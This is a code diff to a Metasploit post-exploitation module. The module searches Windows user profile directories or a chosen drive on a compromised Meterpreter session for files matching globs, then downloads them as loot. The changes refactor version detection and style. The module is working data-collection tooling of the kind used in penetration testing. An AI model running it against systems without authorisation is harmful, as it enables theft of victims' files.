@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::FileSystem
+  include Msf::Post::Windows::Version
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
@@ -23,13 +24,17 @@ class MetasploitModule < Msf::Post
         ],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
               stdapi_fs_search
               stdapi_railgun_api
               stdapi_sys_config_getenv
-              stdapi_sys_config_sysinfo
             ]
           }
         }
@@ -46,28 +51,28 @@ class MetasploitModule < Msf::Post
 
   def download_files(location, file_type)
     sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
-    sysnfo = client.sys.config.sysinfo['OS']
-    profile_path_old = sysdriv + "\\Documents and Settings\\"
-    profile_path_new = sysdriv + "\\Users\\"
+    profile_path_old = sysdriv + '\\Documents and Settings\\'
+    profile_path_new = sysdriv + '\\Users\\'
 
+    version = get_version_info
     if location
       print_status("Searching #{location}")
-      getfile = client.fs.file.search(location, file_type, recurse = true, timeout = -1)
+      getfile = client.fs.file.search(location, file_type, true, -1)
 
-    elsif sysnfo =~ /(Windows XP|2003|.NET)/
+    elsif version.build_number < Msf::WindowsVersion::Vista_SP0
       print_status("Searching #{profile_path_old} through windows user profile structure")
-      getfile = client.fs.file.search(profile_path_old, file_type, recurse = true, timeout = -1)
+      getfile = client.fs.file.search(profile_path_old, file_type, true, -1)
     else
       # For systems such as: Windows 7|Windows Vista|2008
       print_status("Searching #{profile_path_new} through windows user profile structure")
-      getfile = client.fs.file.search(profile_path_new, file_type, recurse = true, timeout = -1)
+      getfile = client.fs.file.search(profile_path_new, file_type, true, -1)
     end
 
     getfile.each do |file|
       filename = "#{file['path']}\\#{file['name']}"
       data = read_file(filename)
       print_status("Downloading #{file['path']}\\#{file['name']}")
-      p = store_loot("host.files", 'application/octet-stream', session, data, file['name'], filename)
+      p = store_loot('host.files', 'application/octet-stream', session, data, file['name'], filename)
       print_good("#{file['name']} saved as: #{p}")
     end
   end
@@ -75,35 +80,33 @@ class MetasploitModule < Msf::Post
   def run
     # When the location is set, make sure we have a valid path format
     location = datastore['SEARCH_FROM']
-    if location and location !~ /^([a-z])\:[\\|\/].*/i
+    if location && location !~ (%r{^([a-z]):[\\|/].*}i)
       print_error("Invalid SEARCH_FROM option: #{location}")
       return
     end
 
     # When the location option is set, make sure we have a valid drive letter
-    my_drive = $1
+    my_drive = ::Regexp.last_match(1)
     drives = get_drives
-    if location and not drives.include?(my_drive)
+    if location && !drives.include?(my_drive)
       print_error("#{my_drive} drive is not available, please try: #{drives.inspect}")
       return
     end
 
-    datastore['FILE_GLOBS'].split(",").each do |glob|
-      begin
-        download_files(location, glob.strip)
-      rescue ::Rex::Post::Meterpreter::RequestError => e
-        if e.message =~ /The device is not ready/
-          print_error("#{my_drive} drive is not ready")
-          next
-        elsif e.message =~ /The system cannot find the path specified/
-          print_error("Path does not exist")
-          next
-        else
-          raise e
-        end
+    datastore['FILE_GLOBS'].split(',').each do |glob|
+      download_files(location, glob.strip)
+    rescue ::Rex::Post::Meterpreter::RequestError => e
+      if e.message =~ /The device is not ready/
+        print_error("#{my_drive} drive is not ready")
+        next
+      elsif e.message =~ /The system cannot find the path specified/
+        print_error('Path does not exist')
+        next
+      else
+        raise e
       end
     end
 
-    print_status("Done!")
+    print_status('Done!')
   end
 end
